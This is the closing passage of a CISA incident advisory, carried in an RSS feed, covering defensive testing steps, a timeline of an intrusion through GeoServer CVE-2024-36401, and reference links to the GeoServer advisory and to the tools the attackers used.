&lt;li&gt;Select an ATT&amp;amp;CK technique described in this advisory (see &lt;a href=&quot;#Table%C2%A03.%20Resource%20Development&quot; title=&quot;Table&amp;nbsp;3. Resource Development&quot;&gt;&lt;strong&gt;Table 3&lt;/strong&gt;&lt;/a&gt; through &lt;a href=&quot;#Table%C2%A011.%20Command%20and%20Control&quot; title=&quot;Table&amp;nbsp;11. Command and Control&quot;&gt;&lt;strong&gt;Table 11&lt;/strong&gt;&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;Align your security technologies against the technique.&lt;/li&gt;
&lt;li&gt;Test your technologies against the technique.&lt;/li&gt;
&lt;li&gt;Analyze your detection and prevention technologies’ performance.&lt;/li&gt;
&lt;li&gt;Repeat the process for all security technologies to obtain a set of comprehensive performance data.&lt;/li&gt;
&lt;li&gt;Tune your security program, including people, processes, and technologies, based on the data generated by this process.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;amp;CK techniques identified in this advisory.&lt;/p&gt;
&lt;h2&gt;Resources&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/incident-response-plan-irp-basics&quot; title=&quot;Incident Response Plan (IRP) Basics&quot;&gt;Incident Response Plan (IRP) Basics&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques&quot; title=&quot;Identifying and Mitigating Living Off the Land Techniques&quot;&gt;Identifying and Mitigating Living Off the Land Techniques&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/phishing-resistant-multi-factor-authentication-mfa-success-story-usdas-fast-identity-online-fido&quot; title=&quot;Phishing-Resistant Multi-Factor Authentication (MFA) Success Story: USDA’s Fast IDentity Online (FIDO) Implementation&quot;&gt;Phishing-Resistant Multi-Factor Authentication (MFA) Success Story: USDA’s Fast IDentity Online (FIDO) Implementation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Disclaimer&lt;/h2&gt;
&lt;p&gt;The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.&lt;/p&gt;
&lt;h2&gt;Version History&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;September 23, 2025:&lt;/strong&gt; Initial version.&lt;/p&gt;
&lt;h2&gt;Apendix: Key Events Timeline&lt;/h2&gt;
&lt;div&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Date/Time&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Relevant Host&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Event&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;July 1, 2024&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;CVE-2024-36401 published.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;July 11, 2024&lt;/td&gt;
&lt;td&gt;GeoServer 1&lt;/td&gt;
&lt;td&gt;Initial Access to GeoServer 1.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;July 15, 2024&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;CVE-2024-36401 added to CISA’s Known Exploited Vulnerabilities Catalog.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;July 15, 2024&lt;/td&gt;
&lt;td&gt;GeoServer 1&lt;/td&gt;
&lt;td&gt;EDR detects Stowaway tool on GeoServer 1.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;July 24, 2024&lt;/td&gt;
&lt;td&gt;GeoServer 2&lt;/td&gt;
&lt;td&gt;Initial Access to GeoServer 2.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;July 31, 2024&lt;/td&gt;
&lt;td&gt;Web Server&lt;/td&gt;
&lt;td&gt;Initial Access to Web Server.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;July 31, 2024&lt;/td&gt;
&lt;td&gt;SQL Server&lt;/td&gt;
&lt;td&gt;Initial Access to SQL Server.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aug. 1, 2024&lt;/td&gt;
&lt;td&gt;SQL Server, GeoServer 1&lt;/td&gt;
&lt;td&gt;Organization observes SQL Alert and contains SQL Server and GeoServer 1.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aug. 1, 2024&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;The impacted organization requested assistance from CISA.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aug. 5, 2024&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;CISA began forensic artifact analysis.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aug. 6, 2024&lt;/td&gt;
&lt;td&gt;GeoServer 2&lt;/td&gt;
&lt;td&gt;Last observed threat actors’ activity—discovery commands on GeoServer 2.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aug. 8 – Sept. 3, 2024&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;CISA conducted their full incident response.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;h2&gt;Notes&lt;/h2&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;GeoServer&quot;&gt;[1]&lt;/a&gt; “GeoServer/GeoServer,” GitHub, published July 1, 2024, &lt;a href=&quot;https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w&quot; target=&quot;_blank&quot; title=&quot;GitHub GeoServer&quot;&gt;https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;dirtycow&quot;&gt;[2]&lt;/a&gt; “firefart/dirtycow,” GitHub, last modified 2021,&lt;em&gt;&amp;nbsp;&lt;/em&gt;&lt;a href=&quot;https://github.com/firefart/dirtycow&quot; target=&quot;_blank&quot; title=&quot;GitHub dirtycow&quot;&gt;https://github.com/firefart/dirtycow&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;RingQ&quot;&gt;[3]&lt;/a&gt; “T4y1oR/RingQ” GitHub, last modified February 19, 2025. &lt;a href=&quot;https://github.com/T4y1oR/RingQ&quot; target=&quot;_blank&quot; title=&quot;GitHub RingQ&quot;&gt;https://github.com/T4y1oR/RingQ&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;fscan&quot;&gt;[4]&lt;/a&gt; “shadow1ng/fscan,” GitHub, last modified July 2025, &lt;a href=&quot;https://github.com/shadow1ng/fscan&quot; target=&quot;_blank&quot; title=&quot;GitHub fscan&quot;&gt;https://github.com/shadow1ng/fscan&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Stowaway&quot;&gt;[5]&lt;/a&gt; “ph4ntonn/Stowaway,” GitHub, last modified April 2025,&lt;em&gt;&amp;nbsp;&lt;/em&gt;&lt;a href=&quot;https://github.com/ph4ntonn/Stowaway&quot; target=&quot;_blank&quot; title=&quot;GitHub Stowaway&quot;&gt;https://github.com/ph4ntonn/Stowaway&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description>
  <pubDate>Mon, 22 Sep 2025 11:12:49 EDT</pubDate>
    <dc:creator>CISA</dc:creator>
    <guid isPermaLink="false">/node/23983</guid>
    </item>

  </channel>
</rss>
